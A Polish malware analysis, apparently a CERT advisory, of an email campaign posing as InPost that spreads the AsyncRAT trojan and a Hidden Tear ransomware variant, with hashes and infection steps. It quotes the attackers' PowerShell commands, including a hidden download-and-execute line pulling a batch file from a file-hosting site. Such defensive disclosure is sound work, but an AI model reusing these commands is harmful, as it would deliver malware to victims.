Trojan oraz ransomware w kampanii podszywającej się pod InPost

Data publikacji: 11/12/2018, Mateusz Szymaniec

Przez kilka ostatnich dni obserwujemy kampanię e-mailową, w której fałszywi nadawcy podają się za firmę kurierską InPost. Wiadomości informują o przesyłce gotowej do odbioru w jednym z paczkomatów. Adres paczkomatu oraz pin potrzebny do odbioru przesyłki ma być dostępny po pobraniu pliku z linku widocznego w wiadomości. Do tej pory wyróżniliśmy dwa typy zagrożeń, które czekają na użytkowników po uruchomieniu pobranych plików. Jednym z nich jest trojan pozwalający na zdalny dostęp do komputera ofiary, a drugim oprogramowanie szyfrujące pliki – ransomware.

Osobom, których pliki zostały zaszyfrowane zdecydowanie odradzamy płacenia okupu. Prosimy takie osoby o bezpośredni kontakt pod adres [email protected], ponieważ jest szansa na odzyskanie Państwa plików.

W obu wariantach wiadomości wysłane zostały z adresu [email protected] z jednym z dwóch tematów:

    • Informujemy, że w serwisie InPost zostało zarejestrowane zlecenie realizacji odbioru przesyłki, której jesteś odbiorcą.
    • Ostateczne wezwanie do odbioru przesyłki z paczkomatu.

Linki w wiadomościach prowadzą do plików zamieszczonych w serwisie „szybkiplik.pl”.

Wariant z trojanem

Pobrane z linku w wiadomości archiwum ZIP zawiera pliki:

    • InPost24_-_Dane_odbioru_paczki.doc.lnk, SHA256: 4a3d55070214dcd6f646fd347a523cdcb61820c74902417720478131d382984d
    • word.info.file.doc, SHA256: 20ce81e489337e6ae90c831945fcb4f493d2e2c117778b77ae62a5b4311c94bb

Dwukrotne kliknięcie na pierwszy plik (skrót systemu Windows) spowoduje uruchomienie następującego polecenia, oraz ostatecznie, drugiego z plików:

..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c word.info.file.doc

Jest to trojan o nazwie „AsyncRAT”, którego kod źródłowy można znaleźć na portalu GitHub. W naszym przypadku zostały zmodyfikowane właściwie tylko adresy serwera C&C – na serwery VPN z firmy AirVPN – w udostępnianej przez tę firmę usłudze umożliwiającej przekierowywanie konkretnych portów z internetu do podłączonego klienta VPN.

Trojan umożliwia przesłanie obrazu wyświetlanego na komputerze ofiary oraz pobieranie i uruchamianie kolejnych plików wykonywalnych.

Wariant z ransomware

W drugim wariancie ataku, link w wiadomości prowadzi do pobrania dokumentu PDF.

    • bf4f76802ece7ec698fbe8328fd3cc3a.pdf, SHA256: 6c2b1c128608164c49166cd9449d13796a02eacdeba06978dbb3447b0d252926

Link z dokumentu PDF prowadzi z kolei do pliku AdobeUpdater.Bat.

    • AdobeUpdater.Bat, SHA256: b43434d6e0da61f217525f35d12953ba162102d6a8f7b2ed344634b13bcd31b3

Uruchomienie tego pliku spowoduje pobranie i uruchomienie kolejnego etapu ataku:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‚https://szybkiplik.pl/files/cf9bbf4dd37dfaa787877dd6b07940c7.bat’,’%TEMP%\blessing.bat’);Start-Process ‚%TEMP%\blessing.bat’

    • blessing.bat, SHA256: 8d2b2a942c9e646a5f388837137a650716e11d95730db7dfeae26ab46778ba99

Plik blessing.bat, wbrew swojemu rozszerzeniu, jest samorozpakowującym się archiwum stworzonym za pomocą programu WinRAR zawierającym pliki:

    • 1.Bat, SHA256: c03408632b57ca17c25a5ea2e8342091b0f82ed37437959870ab20ed5a341ef3
    • 2.bat, SHA256: 0bd43ba6dd7031a89f224b793044c31614ee1629f324c96e3336aa90330315cc
    • 3.bat, SHA256: 53173953629bdb9b2506662a0c912a1cb3cde0c004a86fb02198bd0b2e8fbb00
    • 4.bat, SHA256: ef5ef5c48f9fca2a1b9db5c25bff77a5739570f5cae72baf54243d73b65c7d58
    • admin.exe, SHA256: dc310aebc5b718479c5c55af9bc82d4c898b53058b5780e61100dd81de084335
    • AdobeAcrobatReader.exe, SHA256: b4507efac8dee9b9814f9bb4d0fadf1d539a0205f702e9d6a40ea613a37e91e3
    • FORMA.exe, SHA256: d881db5358f86cb12e3c512c59ec94d9e96b24e12ecc454add145458a3b31f9f
    • invisible.vbs, SHA256: 20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2

Samorozpakowujące się archiwum mogą zawierać również polecenie automatycznego uruchomienia plików. W tym przypadku automatycznie po wypakowaniu do katalogu tymczasowego mają uruchomić się pliki batch: 3.bat oraz 4.bat, które bezpośrednio za pomocą skryptu VBS (ukrywającego okna wiersza polecenia Windows) uruchamiają 1.bat oraz 2.bat. Pierwszy z nich pobiera z serwisu szybkiplik.pl obrazek z notką od ransomware i ustawia ją jako tapetę, a drugi uruchamia aplikacje admin.exe oraz FORMA.exe.

FORMA.exe wyświetla notkę ransomware, a admin.exe prosząc o podniesienie uprawnień (UAC) uruchamia ostatecznie AdobeAcrobatReader.exe.

Kolejna warstwa zaciemniająca i odpakowująca złośliwy kod używa narzędzia Lime-Crypter napisanego w VisualBasic.NET.

Używając narzędzia dnSpy służącego do statycznej i dynamicznej analizy aplikacji .NET możemy łatwo odzyskać kolejną warstwę złośliwego oprogramowania. Należy znaleźć miejsce, w którym jest ona ostatecznie uruchamiana i stawiając tam breakpoint odzyskać odszyfrowany bufor.

Widać również, że pierwsze bajty odzyskanych danych to 0x4D, 0x5A, czyli „MZ”, więc mamy do czynienia z kolejnym plikiem wykonywalnym.

    • hidden-tear-offline.exe, SHA256: 895bb91203381c18eeb48169cd9fb4f7f020ba1c21a5fd89190d11818520502e

Jest to zmodyfikowana wersja już zmodyfikowanego ransomware „Hidden Tear”. Aplikacja zaraz po uruchomieniu generuje klucz do szyfrowania plików, kopiuje się do katalogu użytkownika jako „table.exe” i uruchamia się stamtąd jeszcze raz. Następnie szyfruje pliki (algorytmem AES-256 w trybie CBC) według listy rozszerzeń zakodowanych w aplikacji, zapisywana jest notka ransomware (do pliku „ODSZYFRUJ_PLIKI_TERAZ.txt” na pulpicie) i usuwane są klucze.

Osoby, których pliki zostały zaszyfrowane prosimy o kontakt pod adres [email protected].

Notka ransomware wygląda następująco:

Podsumowanie

Jeżeli posiadają Państwo wiadomości z potencjalnie złośliwymi linkami albo załącznikami, niekoniecznie z tej konkretnej kampanii, prosimy o wysyłanie ich w zgłoszeniach na stronie https://incydent.cert.pl lub mailowo na adres [email protected]

Co warte podkreślenia, oba warianty zagrożenia zostały zbudowane stosunkowo niskim nakładem sił, z użyciem lekko, bądź wcale, zmodyfikowanych projektów „edukacyjnego złośliwego oprogramowania” dostępnych publicznie oraz za darmo w serwisie GitHub. Zmodyfikowany ransomware użyty w ataku ma w serwisie GitHub już ponad 600 forków (kopii), z czego przynajmniej kilkanaście pod różnymi nazwami było używanych w kampaniach złośliwego oprogramowania. Z kolei autor trojana oraz cryptera użytych w tej kampanii ma na swoim githubowym koncie już 11 projektów/komponentów złośliwego oprogramowania. Aktywnie reklamuje je oraz oferuje wsparcie na forach „miłośników” stosowania „edukacyjnego złośliwego oprogramowania” w praktyce.